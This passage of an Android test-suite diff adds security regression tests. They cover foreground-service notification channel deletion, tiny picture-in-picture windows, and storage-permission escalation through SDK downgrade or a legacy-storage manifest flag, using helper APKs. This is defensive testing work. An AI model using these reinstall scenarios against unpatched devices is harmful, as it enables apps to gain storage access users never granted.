STATE_START_1; + startForegroundService(LocalForegroundService.COMMAND_START_FOREGROUND); + waitForResultOrThrow(DELAY, "service to start first time"); + assertNotification(1, LocalForegroundService.getNotificationTitle(1)); + + try { + final String channel = LocalForegroundService.NOTIFICATION_CHANNEL_ID; + noMan.deleteNotificationChannel(channel); + fail("Deleting FGS notification channel did not throw"); + } catch (SecurityException se) { + // Expected outcome, i.e. success case + } catch (Exception e) { + fail("Deleting FGS notification threw unexpected failure " + e); + } + + mExpectedServiceState = STATE_DESTROY; + mContext.stopService(mLocalForegroundService); + waitForResultOrThrow(DELAY, "service to be destroyed"); + + } + class TestSendCallback implements PendingIntent.OnFinished { public volatile int result = -1; diff --git a/tests/framework/base/windowmanager/Android.mk b/tests/framework/base/windowmanager/Android.mk index ef6a95eb75a..39d08127976 100644 --- a/tests/framework/base/windowmanager/Android.mk +++ b/tests/framework/base/windowmanager/Android.mk @@ -44,7 +44,7 @@ LOCAL_STATIC_JAVA_LIBRARIES := \ CtsMockInputMethodLib \ metrics-helper-lib \ -LOCAL_COMPATIBILITY_SUITE := cts vts10 general-tests +LOCAL_COMPATIBILITY_SUITE := cts vts10 general-tests sts LOCAL_SDK_VERSION := test_current diff --git a/tests/framework/base/windowmanager/alertwindowapp/Android.bp b/tests/framework/base/windowmanager/alertwindowapp/Android.bp index 07069deff76..c8245da1b6b 100644 --- a/tests/framework/base/windowmanager/alertwindowapp/Android.bp +++ b/tests/framework/base/windowmanager/alertwindowapp/Android.bp @@ -29,5 +29,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp b/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp index e7cbcdba8f3..fd6d943be6f 100644 --- a/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp +++ b/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp @@ -31,5 +31,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/alertwindowservice/Android.bp b/tests/framework/base/windowmanager/alertwindowservice/Android.bp index 58d8688919f..6aee4e4056d 100644 --- a/tests/framework/base/windowmanager/alertwindowservice/Android.bp +++ b/tests/framework/base/windowmanager/alertwindowservice/Android.bp @@ -27,6 +27,7 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], dex_preopt: { diff --git a/tests/framework/base/windowmanager/app/Android.bp b/tests/framework/base/windowmanager/app/Android.bp index b12f93b2d6d..3512924d721 100644 --- a/tests/framework/base/windowmanager/app/Android.bp +++ b/tests/framework/base/windowmanager/app/Android.bp @@ -33,5 +33,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/app/AndroidManifest.xml b/tests/framework/base/windowmanager/app/AndroidManifest.xml index e17658af166..fd55b69fb0a 100755 --- a/tests/framework/base/windowmanager/app/AndroidManifest.xml +++ b/tests/framework/base/windowmanager/app/AndroidManifest.xml @@ -172,6 +172,15 @@ android:minHeight="80dp" /> </activity> + <activity android:name=".PipActivityWithTinyMinimalSize" + android:resizeableActivity="false" + android:supportsPictureInPicture="true" + android:configChanges="orientation|screenSize|smallestScreenSize|screenLayout" + android:exported="true" + android:taskAffinity="nobody.but.PipActivity"> + <layout android:minWidth="1dp" + android:minHeight="1dp"/> + </activity> <activity android:name=".FreeformActivity" android:resizeableActivity="true" android:taskAffinity="nobody.but.FreeformActivity" diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java index 108e034fcea..97457be6750 100644 --- a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java +++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java @@ -79,6 +79,8 @@ public class Components extends ComponentsBase { public static final ComponentName PIP_ACTIVITY2 = component("PipActivity2"); public static final ComponentName PIP_ACTIVITY_WITH_MINIMAL_SIZE = component( "PipActivityWithMinimalSize"); + public static final ComponentName PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE = component( + "PipActivityWithTinyMinimalSize"); public static final ComponentName PIP_ACTIVITY_WITH_SAME_AFFINITY = component("PipActivityWithSameAffinity"); public static final ComponentName PIP_ON_STOP_ACTIVITY = component("PipOnStopActivity"); diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java new file mode 100644 index 00000000000..cd1c625ae3f --- /dev/null +++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java @@ -0,0 +1,24 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License + */ + +package android.server.wm.app; + +/** + * An activity that has the same behavior as {@link PipActivity} and specifies + * minimal dimension in its manifest which is tiny and smaller than the allowed minimum. + */ +public class PipActivityWithTinyMinimalSize extends PipActivity { +} diff --git a/tests/framework/base/windowmanager/app27/Android.bp b/tests/framework/base/windowmanager/app27/Android.bp index 6ddf919c573..79d2d22974e 100644 --- a/tests/framework/base/windowmanager/app27/Android.bp +++ b/tests/framework/base/windowmanager/app27/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/appAShareUid/Android.bp b/tests/framework/base/windowmanager/appAShareUid/Android.bp index 57adfd61346..052f829921b 100644 --- a/tests/framework/base/windowmanager/appAShareUid/Android.bp +++ b/tests/framework/base/windowmanager/appAShareUid/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/appBShareUid/Android.bp b/tests/framework/base/windowmanager/appBShareUid/Android.bp index ec15e80daf9..8fe4775ea67 100644 --- a/tests/framework/base/windowmanager/appBShareUid/Android.bp +++ b/tests/framework/base/windowmanager/appBShareUid/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp b/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp index c83b44fd116..8582bf1e5a2 100644 --- a/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp +++ b/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/appDisplaySize/Android.bp b/tests/framework/base/windowmanager/appDisplaySize/Android.bp index 819a9bfafeb..d492d7bfcb7 100644 --- a/tests/framework/base/windowmanager/appDisplaySize/Android.bp +++ b/tests/framework/base/windowmanager/appDisplaySize/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp b/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp index d110d199495..6f5d5e4b61e 100644 --- a/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp +++ b/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp @@ -24,5 +24,6 @@ android_test_helper_app { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/appProfileable/Android.bp b/tests/framework/base/windowmanager/appProfileable/Android.bp index cd540941943..2dcd954868f 100644 --- a/tests/framework/base/windowmanager/appProfileable/Android.bp +++ b/tests/framework/base/windowmanager/appProfileable/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts" ], } diff --git a/tests/framework/base/windowmanager/appSecondUid/Android.bp b/tests/framework/base/windowmanager/appSecondUid/Android.bp index 5f44f5c971b..692f73bbef1 100644 --- a/tests/framework/base/windowmanager/appSecondUid/Android.bp +++ b/tests/framework/base/windowmanager/appSecondUid/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/appThirdUid/Android.bp b/tests/framework/base/windowmanager/appThirdUid/Android.bp index 08a878ccb79..22bab9d60ed 100644 --- a/tests/framework/base/windowmanager/appThirdUid/Android.bp +++ b/tests/framework/base/windowmanager/appThirdUid/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/dndsourceapp/Android.bp b/tests/framework/base/windowmanager/dndsourceapp/Android.bp index 7abd47847ce..9a1463e1937 100644 --- a/tests/framework/base/windowmanager/dndsourceapp/Android.bp +++ b/tests/framework/base/windowmanager/dndsourceapp/Android.bp @@ -26,5 +26,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/dndtargetapp/Android.bp b/tests/framework/base/windowmanager/dndtargetapp/Android.bp index 00b40551e91..0a14121d22e 100644 --- a/tests/framework/base/windowmanager/dndtargetapp/Android.bp +++ b/tests/framework/base/windowmanager/dndtargetapp/Android.bp @@ -24,6 +24,7 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], static_libs: ["cts-wm-app-base"], diff --git a/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp b/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp index 13dbca2e31f..4420670fa80 100644 --- a/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp +++ b/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp @@ -24,6 +24,7 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], static_libs: ["cts-wm-app-base"], diff --git a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java index 3ac15bb12fb..6e19de2ec1c 100644 --- a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java +++ b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java @@ -29,6 +29,7 @@ import static android.server.wm.UiDeviceUtils.pressWindowButton; import static android.server.wm.WindowManagerState.STATE_PAUSED; import static android.server.wm.WindowManagerState.STATE_RESUMED; import static android.server.wm.WindowManagerState.STATE_STOPPED; +import static android.server.wm.WindowManagerState.dpToPx; import static android.server.wm.app.Components.ALWAYS_FOCUSABLE_PIP_ACTIVITY; import static android.server.wm.app.Components.LAUNCHING_ACTIVITY; import static android.server.wm.app.Components.LAUNCH_ENTER_PIP_ACTIVITY; @@ -38,6 +39,7 @@ import static android.server.wm.app.Components.PIP_ACTIVITY; import static android.server.wm.app.Components.PIP_ACTIVITY2; import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_MINIMAL_SIZE; import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_SAME_AFFINITY; +import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE; import static android.server.wm.app.Components.PIP_ON_STOP_ACTIVITY; import static android.server.wm.app.Components.PipActivity.ACTION_ENTER_PIP; import static android.server.wm.app.Components.PipActivity.ACTION_FINISH; @@ -89,6 +91,7 @@ import android.graphics.Rect; import android.os.Handler; import android.os.Looper; import android.platform.test.annotations.Presubmit; +import android.platform.test.annotations.SecurityTest; import android.provider.Settings; import android.server.wm.CommandSession.ActivityCallback; import android.server.wm.CommandSession.SizeInfo; @@ -144,6 +147,8 @@ public class PinnedStackTests extends ActivityManagerTestBase { private static final int MAX_ASPECT_RATIO_NUMERATOR = 239; private static final int MAX_ASPECT_RATIO_DENOMINATOR = 100; private static final int ABOVE_MAX_ASPECT_RATIO_NUMERATOR = MAX_ASPECT_RATIO_NUMERATOR + 1; + // Corresponds to com.android.internal.R.dimen.overridable_minimal_size_pip_resizable_task + private static final int OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK = 48; @Before @Override @@ -250,8 +255,6 @@ public class PinnedStackTests extends ActivityManagerTestBase { assertPinnedStackActivityIsInDisplayBounds(PIP_ACTIVITY); } - // TODO: launch/size pip to a size smaller than limitation and verify the minWidth/minHeight - // is respected after b/149338177. @Test public void testEnterPipWithMinimalSize() throws Exception { // Launch a PiP activity with minimal size specified @@ -276,6 +279,30 @@ public class PinnedStackTests extends ActivityManagerTestBase { } @Test + @SecurityTest(minPatchLevel="2021-03") + public void testEnterPipWithTinyMinimalSize() throws Exception { + // Launch a PiP activity with minimal size specified and smaller than allowed minimum + launchActivity(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE, EXTRA_ENTER_PIP, "true"); + // Wait for animation complete since we are comparing size + waitForEnterPipAnimationComplete(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE); + assertPinnedStackExists(); + + final WindowManagerState.WindowState windowState = getWindowState( + PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE); + final WindowManagerState.DisplayContent display = mWmState.getDisplay( + windowState.getDisplayId()); + final int overridableMinSize = dpToPx( + OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK, display.getDpi()); + + // compare the bounds to verify that it's no smaller than allowed minimum on both dimensions + final Rect pipBounds = getPinnedStackBounds(); + assertTrue("Pinned task bounds " + pipBounds + " isn't smaller than minimal " + + overridableMinSize + " on both dimensions", + pipBounds.width() >= overridableMinSize + && pipBounds.height() >= overridableMinSize); + } + + @Test public void testEnterPipAspectRatioMin() throws Exception { testEnterPipAspectRatio(MIN_ASPECT_RATIO_NUMERATOR, MIN_ASPECT_RATIO_DENOMINATOR); } diff --git a/tests/framework/base/windowmanager/translucentapp/Android.bp b/tests/framework/base/windowmanager/translucentapp/Android.bp index c551c29896c..3a19970473d 100644 --- a/tests/framework/base/windowmanager/translucentapp/Android.bp +++ b/tests/framework/base/windowmanager/translucentapp/Android.bp @@ -31,5 +31,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/framework/base/windowmanager/translucentappsdk26/Android.bp b/tests/framework/base/windowmanager/translucentappsdk26/Android.bp index 7c8d0d88929..4ec800b6fd0 100644 --- a/tests/framework/base/windowmanager/translucentappsdk26/Android.bp +++ b/tests/framework/base/windowmanager/translucentappsdk26/Android.bp @@ -29,5 +29,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/inputmethod/mockime/Android.bp b/tests/inputmethod/mockime/Android.bp index c73f870dedd..dbf6ad18eb6 100644 --- a/tests/inputmethod/mockime/Android.bp +++ b/tests/inputmethod/mockime/Android.bp @@ -42,6 +42,7 @@ android_test_helper_app { "cts", "vts10", "general-tests", + "sts", ], static_libs: [ "androidx.annotation_annotation", diff --git a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java index 974d02ab903..790880b82db 100644 --- a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java +++ b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java @@ -933,6 +933,11 @@ public class SensorDirectReportTest extends SensorTestCase { if (samplingPeriodUs < s.getMinDelay()) { return; } + + if (samplingPeriodUs > s.getMaxDelay()) { + samplingPeriodUs = s.getMaxDelay(); + } + resetEvent(); mChannel = prepareDirectChannel(memType, false /* secondary */); diff --git a/tests/tests/media/AndroidManifest.xml b/tests/tests/media/AndroidManifest.xml index 3825d8f04fe..c24f26be6a0 100644 --- a/tests/tests/media/AndroidManifest.xml +++ b/tests/tests/media/AndroidManifest.xml @@ -123,7 +123,7 @@ </intent-filter> </activity> <activity android:name="android.media.cts.MockActivity" /> - <activity android:name="android.media.cts.MediaRouter2TestActivity"/> + <activity android:name="android.media.cts.MediaRouter2TestActivity" /> <service android:name="android.media.cts.RemoteVirtualDisplayService" android:process=":remoteService" > <intent-filter> diff --git a/tests/tests/packageinstaller/emptytestapp/Android.bp b/tests/tests/packageinstaller/emptytestapp/Android.bp index 3c8939b97a1..5c4638019eb 100644 --- a/tests/tests/packageinstaller/emptytestapp/Android.bp +++ b/tests/tests/packageinstaller/emptytestapp/Android.bp @@ -23,5 +23,6 @@ android_test_helper_app { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/tests/packageinstaller/uninstall/Android.bp b/tests/tests/packageinstaller/uninstall/Android.bp index 50d1a524cde..8ae5bb45fe9 100644 --- a/tests/tests/packageinstaller/uninstall/Android.bp +++ b/tests/tests/packageinstaller/uninstall/Android.bp @@ -30,5 +30,6 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], } diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml index 5277c9aff09..66b65602bf3 100644 --- a/tests/tests/permission/AndroidTest.xml +++ b/tests/tests/permission/AndroidTest.xml @@ -65,6 +65,9 @@ <option name="push" value="CtsInstallPermissionEscalatorApp.apk->/data/local/tmp/cts/permissions/CtsInstallPermissionEscalatorApp.apk" /> <option name="push" value="CtsAppThatRequestsOneTimePermission.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsOneTimePermission.apk" /> <option name="push" value="AppThatDefinesUndefinedPermissionGroupElement.apk->/data/local/tmp/cts/permissions/AppThatDefinesUndefinedPermissionGroupElement.apk" /> + <option name="push" value="CtsStorageEscalationApp28.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp28.apk" /> + <option name="push" value="CtsStorageEscalationApp29Full.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Full.apk" /> + <option name="push" value="CtsStorageEscalationApp29Scoped.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Scoped.apk" /> </target_preparer> <!-- Remove additional apps if installed --> diff --git a/tests/tests/permission/StorageEscalationApp28/Android.bp b/tests/tests/permission/StorageEscalationApp28/Android.bp new file mode 100644 index 00000000000..959a00a7b18 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp28/Android.bp @@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp28", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "sts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml new file mode 100644 index 00000000000..f1bd315c630 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="28" android:targetSdkVersion="28" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" /> +</manifest> diff --git a/tests/tests/permission/StorageEscalationApp29Full/Android.bp b/tests/tests/permission/StorageEscalationApp29Full/Android.bp new file mode 100644 index 00000000000..8eeb101df7e --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Full/Android.bp @@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp29Full", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "sts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml new file mode 100644 index 00000000000..73a7110deca --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" android:requestLegacyExternalStorage="true"/> +</manifest> diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp new file mode 100644 index 00000000000..97b8a219d2f --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp @@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp29Scoped", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "sts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml new file mode 100644 index 00000000000..c3812fe3d47 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml @@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" android:requestLegacyExternalStorage="false"/> +</manifest> diff --git a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java index b53bf6a0cc4..d81ab06aa61 100644 --- a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java +++ b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java @@ -18,10 +18,8 @@ package android.permission.cts; import static android.Manifest.permission.ACCESS_BACKGROUND_LOCATION; import static android.Manifest.permission.ACCESS_COARSE_LOCATION; -import static android.Manifest.permission.ACCESS_MEDIA_LOCATION; import static android.Manifest.permission.READ_CALL_LOG; import static android.Manifest.permission.READ_CONTACTS; -import static android.Manifest.permission.READ_EXTERNAL_STORAGE; import static android.app.AppOpsManager.MODE_FOREGROUND; import static android.content.pm.PackageManager.FLAG_PERMISSION_REVIEW_REQUIRED; import static android.content.pm.PackageManager.FLAG_PERMISSION_USER_SET; @@ -268,22 +266,6 @@ public class SplitPermissionTest { * If a permission was granted before the split happens, the new permission should inherit the * granted state. * - * This is a duplicate of {@link #inheritGrantedPermissionState} but for the storage permission - */ - @Test - public void inheritGrantedPermissionStateStorage() throws Exception { - install(APK_STORAGE_29); - grantPermission(APP_PKG, READ_EXTERNAL_STORAGE); - - install(APK_STORAGE_28); - - assertPermissionGranted(ACCESS_MEDIA_LOCATION); - } - - /** - * If a permission was granted before the split happens, the new permission should inherit the - * granted state. - * * <p>App using a shared uid */ @Test diff --git a/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt new file mode 100644 index 00000000000..2e67179e0ce --- /dev/null +++ b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt @@ -0,0 +1,94 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.permission.cts + +import android.Manifest.permission.ACCESS_MEDIA_LOCATION +import android.Manifest.permission.READ_EXTERNAL_STORAGE +import android.Manifest.permission.WRITE_EXTERNAL_STORAGE +import android.app.Instrumentation +import android.app.UiAutomation +import android.content.Context +import android.content.pm.PackageManager +import android.platform.test.annotations.SecurityTest +import androidx.test.platform.app.InstrumentationRegistry +import com.android.compatibility.common.util.SystemUtil +import org.junit.After +import org.junit.Assert +import org.junit.Before +import org.junit.Test + +class StorageEscalationTest { + companion object { + private const val APK_DIRECTORY = "/data/local/tmp/cts/permissions" + const val APP_APK_PATH_28 = "$APK_DIRECTORY/CtsStorageEscalationApp28.apk" + const val APP_APK_PATH_29_SCOPED = "$APK_DIRECTORY/CtsStorageEscalationApp29Scoped.apk" + const val APP_APK_PATH_29_FULL = "$APK_DIRECTORY/CtsStorageEscalationApp29Full.apk" + const val APP_PACKAGE_NAME = "android.permission3.cts.storageescalation" + const val DELAY_TIME_MS: Long = 200 + val permissions = listOf<String>(READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE, + ACCESS_MEDIA_LOCATION) + } + + private val instrumentation: Instrumentation = InstrumentationRegistry.getInstrumentation() + private val context: Context = instrumentation.context + private val uiAutomation: UiAutomation = instrumentation.uiAutomation + + @Before + @After + fun uninstallApp() { + SystemUtil.runShellCommand("pm uninstall $APP_PACKAGE_NAME") + } + + private fun installPackage(apk: String) { + SystemUtil.runShellCommand("pm install -r $apk") + } + + private fun grantStoragePermissions() { + for (permName in permissions) { + uiAutomation.grantRuntimePermission(APP_PACKAGE_NAME, permName) + } + } + + private fun assertStoragePermissionState(granted: Boolean) { + for (permName in permissions) { + Assert.assertEquals(granted, context.packageManager.checkPermission(permName, + APP_PACKAGE_NAME) == PackageManager.PERMISSION_GRANTED) + } + } + + @Test + @SecurityTest(minPatchLevel = "2021-03") + fun testCannotEscalateWithSdkDowngrade() { + runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_28) + } + + @Test + @SecurityTest(minPatchLevel = "2021-03") + fun testCannotEscalateWithNewManifestLegacyRequest() { + runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_29_FULL) + } + + private fun runStorageEscalationTest(startPackageApk: String, finishPackageApk: String) { + installPackage(startPackageApk) + grantStoragePermissions() + assertStoragePermissionState(granted = true) + installPackage(finishPackageApk) + // permission revoke is async, so wait a short period + Thread.sleep(DELAY_TIME_MS) + assertStoragePermissionState(granted = false) + } +} diff --git a/tests/tests/permission2/res/raw/android_manifest.xml b/tests/tests/permission2/res/raw/android_manifest.xml index 4acb83fb144..974012f2551 100644 --- a/tests/tests/permission2/res/raw/android_manifest.xml +++ b/tests/tests/permission2/res/raw/android_manifest.xml @@ -478,6 +478,8 @@ <protected-broadcast android:name="android.app.action.ACTION_PASSWORD_FAILED" /> <protected-broadcast android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" /> <protected-broadcast android:name="com.android.server.ACTION_EXPIRED_PASSWORD_NOTIFICATION" /> + <protected-broadcast android:name="com.android.server.ACTION_PROFILE_OFF_DEADLINE" /> + <protected-broadcast android:name="com.android.server.ACTION_TURN_PROFILE_ON_NOTIFICATION" /> 